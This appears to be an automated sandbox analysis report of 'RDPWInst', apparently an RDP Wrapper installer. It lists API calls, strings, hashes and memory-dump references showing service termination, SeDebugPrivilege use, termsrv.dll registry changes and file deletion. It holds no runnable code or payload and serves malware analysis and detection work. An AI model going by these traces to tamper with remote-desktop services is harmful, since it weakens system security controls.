                                                                                                                                                          • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001E94,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                                                                                                                        • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                                                                                                                          • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                                                                          • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                                                                                                                        • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                                                                                                                        • API String ID: 3534747103-2332903941
                                                                                                                                                        • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                                                                                        • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                                                                                                                        • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                                                                                                                        • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                                                                                                                        • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                                                                                                                        • API String ID: 1427661212-4281953003
                                                                                                                                                        • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                                                                                        • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                                                                                                                        • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                                                                                                                        • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                                                                                          • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                                                                                          • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                                                                                          • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                                                                                                                        • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                                                                        • String ID: $sD$(4A$LpD
                                                                                                                                                        • API String ID: 135118572-2961882766
                                                                                                                                                        • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                                                                                        • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                                                                                                                        • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                                                                                                                        • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                                                                                                                        • GetLastError.KERNEL32(?), ref: 00409F4A
                                                                                                                                                        • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                                                                                                                        • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040A031
                                                                                                                                                        • RaiseException.KERNEL32(C0FB007F,00000000,00000001,?), ref: 0040A067
                                                                                                                                                          • Part of subcall function 00409D9C: LocalAlloc.KERNEL32(00000040,00000008), ref: 00409DA8
                                                                                                                                                          • Part of subcall function 00409D9C: RaiseException.KERNEL32(C0FB0008,00000000,00000001,?,00000040,00000008), ref: 00409DBD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionRaise$CriticalErrorLastLibrarySection$AddressAllocEnterFreeLeaveLoadLocalProc
                                                                                                                                                        • String ID: $
                                                                                                                                                        • API String ID: 4255670546-3993045852
                                                                                                                                                        • Opcode ID: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                                                                                        • Instruction ID: e7bef61209e92d946731ec4a4071e7a79c0b4aa0f4738c46576ebf8cfa3b661b
                                                                                                                                                        • Opcode Fuzzy Hash: 08a0a7318c753487ffaddfe208f10df44aed4acf1db62cc8abab006cc3ed4991
                                                                                                                                                        • Instruction Fuzzy Hash: EE618D7590070AAFDB21DFA5D885BAFB3B4AF48314F14803AE504B62D2D7789D44CB59
                                                                                                                                                        APIs
                                                                                                                                                        • MessageBoxA.USER32(00000000,?,004026E0,00002010), ref: 00403F39
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message
                                                                                                                                                        • String ID: $$zD$$zD$7$D&@$l&@$zPD$&@
                                                                                                                                                        • API String ID: 2030045667-2939321579
                                                                                                                                                        • Opcode ID: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                                                                                        • Instruction ID: 997706f527e00cc568bc624ae0a330c29571725258f71f9dd8560831bc4d878f
                                                                                                                                                        • Opcode Fuzzy Hash: fc4d6aa325ebee328d8d0a4eacd8edc52d624fa8d19bb34694b2db134725d9d3
                                                                                                                                                        • Instruction Fuzzy Hash: E5B1B434A042548FDB20DF2DC884B997BE8AB09745F1441FAE449F7382CB799E85CB59
                                                                                                                                                        APIs
                                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00415476,?,?,00000000,00000000), ref: 004151CE
                                                                                                                                                          • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                                                                        • Opcode ID: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                                                                                        • Instruction ID: d9a4c13083f090c9220c38b115c8470d0dd0b24888f81dbd48f38483d2476b95
                                                                                                                                                        • Opcode Fuzzy Hash: 4a29d05eb48406c99d8d70e3cc1c652b0ba952fed9bde6c231d4620e19fd4c29
                                                                                                                                                        • Instruction Fuzzy Hash: C6717E34B005489BDB04EBA5C881BDF73A6DB88308F50843BB201EB39ADA3DDD95975C
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004198D5
                                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004198F1
                                                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0041992A
                                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004199A7
                                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004199C0
                                                                                                                                                        • VariantCopy.OLEAUT32(?), ref: 004199F5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 351091851-3916222277
                                                                                                                                                        • Opcode ID: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                                                                                        • Instruction ID: 05f3e7187411a66581312748be8f4c599b64c7f757b61d9c7bcf5be2e84cfcbc
                                                                                                                                                        • Opcode Fuzzy Hash: 73a745a2ba0fcdb29b417b5ebc4a60c480dc22ae13af212b94654390cab902c0
                                                                                                                                                        • Instruction Fuzzy Hash: BB510E75A1061D9BCB62DB59CC91AD9B3BCAF0C314F0041DAE509D7311DA389FC18F69
                                                                                                                                                        APIs
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00406208
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                                                        • Opcode ID: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                                                                                        • Instruction ID: 3d9f27a079d1a1e85d20769b70378e11af8d5357eb747b9bac5a8d01f7cd0a80
                                                                                                                                                        • Opcode Fuzzy Hash: c76f607bb4b5e88e0da518b266601389a2190e5d150480926aab9b651256bb34
                                                                                                                                                        • Instruction Fuzzy Hash: F8F09064688700B9FA1077A09D8BF5A264C5741F18F648A7FBA107C0E3C7FC44C5D66E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                                                                                        • Instruction ID: cdb4153b94d32a19bbaa749183bbd41ea1cad44ce1b02117721c392bcbf59f8f
                                                                                                                                                        • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                                                                                        • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                                                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpyn$AddressHandleModuleProc
                                                                                                                                                        • String ID: GetLongPathNameW$kernel32.dll
                                                                                                                                                        • API String ID: 682285877-568771998
                                                                                                                                                        • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                                                                                        • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                                                                                                                        • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                                                                                        • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                                                                                                                        Strings
                                                                                                                                                        • $sD, xrefs: 0043CA16
                                                                                                                                                        • [-] OpenKey error (code , xrefs: 0043CA1B
                                                                                                                                                        • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                                                                                                                        • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                                                                                                                        • ServiceDll, xrefs: 0043CA58
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                        • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                                                                                                                        • API String ID: 1452528299-1418523706
                                                                                                                                                        • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                                                                                        • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                                                                                                                        • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                                                                                        • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                                                                                                                        APIs
